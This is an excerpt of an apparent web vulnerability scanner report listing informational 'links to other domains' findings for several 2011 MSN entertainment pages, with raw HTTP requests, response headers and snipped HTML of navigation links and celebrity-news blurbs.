<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345080&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+1+trillion&amp;form=msnpop"><strong>
...[SNIP]...
<div>The rapper (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=p+diddy&amp;go=&amp;form=msnpop">photos</a>) reportedly is being sued for $1 trillion by a woman who claims he date-raped her. (Find out how much Sean ...<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=P+Diddy%27s+net+worth&amp;form=msnpop">Diddy... Combs is worth</a>.) The disaster at the World Trade Center (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=World+Trade+Center&amp;FORM=msnpop">photos</a>
...[SNIP]...
<div>In other Diddy news, he reportedly says he...d love to have a marriage like his friends. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=diddy+and+beyonce+inspiration&amp;form=msnpop">Find out</a>
...[SNIP]...
<div>He...s going to play a detective on <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&amp;go=&amp;form=msnpop">this TV series.</a>
...[SNIP]...
<div>Elton John defends hip-hop. Here...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&amp;form=msnpop">what he says.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.305. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx?cp-documentid=27455006 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6da00a0abea248cba826f2c8b2499836; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FF78F28A1E2140FEB4B72975B1E38A79; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406700&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FDiddy-sued-for-%241-trillion.aspx%3Fcp-documentid%3D27455006&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+1+trillion&amp;form=msnpop"><strong>
...[SNIP]...
<div>The rapper (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=p+diddy&amp;go=&amp;form=msnpop">photos</a>) reportedly is being sued for $1 trillion by a woman who claims he date-raped her. (Find out how much Sean ...<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=P+Diddy%27s+net+worth&amp;form=msnpop">Diddy... Combs is worth</a>.) The disaster at the World Trade Center (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=World+Trade+Center&amp;FORM=msnpop">photos</a>
...[SNIP]...
<div>In other Diddy news, he reportedly says he...d love to have a marriage like his friends. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=diddy+and+beyonce+inspiration&amp;form=msnpop">Find out</a>
...[SNIP]...
<div>He...s going to play a detective on <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Diddy+and+Hawaii+Five-O&amp;go=&amp;form=msnpop">this TV series.</a>
...[SNIP]...
<div>Elton John defends hip-hop. Here...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Elton+John+and+hip+hop+and++phenomenon&amp;form=msnpop">what he says.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.306. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx?cp-documentid=27421108&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:35 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e6779a34e7084b25ac34e89e79c96cf9; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5B71CF800A144F299841AF3CCD2825DD; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406715&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Famous+February+birthdays&amp;form=msnhal"><strong>
...[SNIP]...
<div>What TV star recently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&amp;FORM=msnhal">filed for divorce</a>? Who's <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&amp;form=msnhal">rumored to have been cheating</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.307. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx?cp-documentid=27421108&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90360dc9b02e433081fd7c5ed1d8d5ff; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=43595DDE06BC478BB4F3058AB1F86E37; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345088&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FFamous-February-birthdays.aspx%3Fcp-documentid%3D27421108%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Famous+February+birthdays&amp;form=msnhal"><strong>
...[SNIP]...
<div>What TV star recently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=michael+c+hall+jennifer+carpenter+divorce&amp;FORM=msnhal">filed for divorce</a>? Who's <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=ashton+kutcher+cheating+rumors&amp;form=msnhal">rumored to have been cheating</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.308. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx?cp-documentid=27467016 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=19823443adb0450b96ef90e02cc8dbae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=24C3266C14EC40D9B42A1F40D09CEE72; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345084&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Police arrested Janine Lindemulder in Texas <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&amp;go=&amp;form=msnpop">for harassing</a> her ex-husband, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james&amp;form=msnpop">Jesse James</a>... Lindemulder had multiple warrants out for her arrest (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=janine+lindemulder+warrants&amp;form=msnpop">how many?</a>
...[SNIP]...
<div>Lindemulder is currently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=lindemulder+three+warrants+jail&amp;form=msnpop">behind bars</a>
...[SNIP]...
<div>Jesse James recently announced his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james+engaged&amp;form=msnpop">plans to marry again</a>
...[SNIP]...
<div>See pics of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=kat+von+d&amp;qpvt=kat+von+d&amp;FORM=msnpop">the woman</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.309. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx?cp-documentid=27467016 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=49cf7ff8fca2449da769326f63d05416; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7945FEEB4E084CD1BE4E201A0D14327D; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
